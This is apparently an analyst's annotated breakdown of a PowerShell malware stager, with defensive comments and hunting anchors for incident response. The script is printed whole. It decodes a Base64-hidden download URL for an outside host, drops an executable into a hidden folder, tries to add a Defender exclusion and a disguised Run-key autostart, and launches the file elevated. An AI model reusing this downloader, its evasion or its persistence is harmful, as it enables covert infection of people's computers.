# Analyst annotation (the language is PowerShell, not POSIX shell). The code is
# unchanged; statements that were collapsed onto two lines are shown one per line.
#
# Summary: a download-and-execute stager. It Base64-decodes its strings at
# runtime, creates a GUID-named directory under %LOCALAPPDATA%, downloads an
# executable into it, marks the directory and file Hidden, attempts two registry
# writes (a Defender path exclusion and a Run-key autostart), launches the file
# with the RunAs verb, then deletes the directory once the process exits.
#
# Triage anchors visible in the script:
#   - a script block dense with FromBase64String calls (visible in PowerShell
#     script block logging, event 4104, when that logging is enabled)
#   - System.Net.WebClient.DownloadFile writing into %LOCALAPPDATA%\<GUID>\
#   - a Run-key value named "WindowsUpdater"
#   - a process started with Verb=RunAs from a Hidden directory

# --- Base64-encoded string table (decoded values in comments; URL defanged) ---
# $c1 -> hxxps://x8ajbi57h1[.]centralus[.]cloudapp[.]azure[.]com/testproject.exe
$c1='aHR0cHM6Ly94OGFqYmk1N2gxLmNlbnRyYWx1cy5jbG91ZGFwcC5henVyZS5jb20vdGVzdHByb2plY3QuZXhl'
# $c2 -> testproject.exe (local file name for the download)
$c2='dGVzdHByb2plY3QuZXhl'
# $c3 -> Hidden (used as a file attribute and as the window style)
$c3='SGlkZGVu'
# $c4 -> SilentlyContinue (passed to -EA, i.e. -ErrorAction, throughout)
$c4='U2lsZW50bHlDb250aW51ZQ=='
# $c5 -> Stop (decoded below as $d5 but never referenced afterwards)
$c5='U3RvcA=='
# $c6 -> Directory
$c6='RGlyZWN0b3J5'
# $c7 -> HCU:\Software\Microsoft\Windows Defender\Exclusions\Paths
$c7='SENVOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93cyBEZWZlbmRlclxFeGNsdXNpb25zXFBhdGhz'
# $c8 -> HCU:\Software\Microsoft\Windows\CurrentVersion\Run
$c8='SENVOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4='
# $c9 -> WindowsUpdater (registry value name chosen to look like an OS component)
$c9='V2luZG93c1VwZGF0ZXI='
# NOTE(review): $c7 and $c8 decode to a drive named "HCU:", not "HKCU:".
# PowerShell's default registry drives are HKLM: and HKCU:, so on a stock host
# these two paths presumably do not resolve and the registry writes below fail
# silently. Confirm on the affected host rather than assuming that persistence
# or the exclusion actually landed.

# --- Runtime decoding: each $dN is the UTF-8 text of the matching $cN ---
$d1=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c1))
$d2=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c2))
$d3=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c3))
$d4=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c4))
$d5=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c5))
$d6=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c6))
$d7=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c7))
$d8=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c8))
$d9=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($c9))

# --- Staging location: %LOCALAPPDATA%\<fresh GUID>\testproject.exe ---
# The directory name is random per run, so hunt on the parent path and on the
# file name rather than on a fixed directory.
$w1=Join-Path $env:LOCALAPPDATA ([System.Guid]::NewGuid().ToString())
New-Item -ItemType $d6 -Path $w1 -EA $d4|Out-Null
$w2=Join-Path $w1 $d2

# Get-Info: returns the OS caption from Win32_OperatingSystem, or $null on error.
# The -p parameter is accepted but never read inside the function.
function Get-Info{param([string]$p);try{$h=Get-WmiObject Win32_OperatingSystem -EA $d4;return $h.Caption}catch{return $null}}

# Set-Config1: if the $d7 path exists, reads the property values already there
# into $v (never used) and adds a String value with a random name whose data is
# $p, the downloaded file's path. The intent is a Defender path exclusion; see
# the HCU: note above. All errors are swallowed.
function Set-Config1{param([string]$p);try{if(Test-Path $d7){$v=(Get-ItemProperty -Path $d7 -EA $d4).PSObject.Properties.Value;$n=[System.IO.Path]::GetRandomFileName();New-ItemProperty -Path $d7 -Name $n -Value $p -PropertyType String -Force -EA $d4|Out-Null}}catch{}}

# Set-Config2: writes a String value named $d9 ("WindowsUpdater") under the $d8
# Run-key path, with data $p, as logon autostart persistence. Errors are swallowed.
function Set-Config2{param([string]$p);try{New-ItemProperty -Path $d8 -Name $d9 -Value $p -PropertyType String -Force -EA $d4|Out-Null}catch{}}

# The OS caption is collected into $i, but $i is not referenced again in this script.
$i=Get-Info -p $w1
# Short random delay: Get-Random's -Maximum is exclusive, so 50-299 ms.
Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 300)
try{
    # Download the payload from $d1 to $w2 over HTTPS via System.Net.WebClient.
    $wc=New-Object System.Net.WebClient
    $wc.DownloadFile($d1,$w2)
    # Set the Hidden attribute on both the staging directory and the file.
    (Get-Item $w1).Attributes=$d3
    (Get-Item $w2).Attributes=$d3
    # Attempt the exclusion and the Run-key write, both pointing at $w2.
    Set-Config1 -p $w2
    Set-Config2 -p $w2
    # Launch the download with a hidden window and the RunAs verb, which
    # requests elevation.
    $pi=New-Object System.Diagnostics.ProcessStartInfo
    $pi.FileName=$w2
    $pi.WindowStyle=$d3
    $pi.Verb='RunAs'
    $p=[System.Diagnostics.Process]::Start($pi)
    $p.WaitForExit()
    # Delete the staging directory after the child exits. Any Run value written
    # above would then reference a path this script has deleted; whether the
    # payload copies itself elsewhere cannot be told from here.
    Remove-Item $w1 -Recurse -Force -EA $d4
}catch{exit 1}finally{Write-Host "Process completed."}
# Any exception inside the try exits with status 1; the finally block writes a
# generic status line.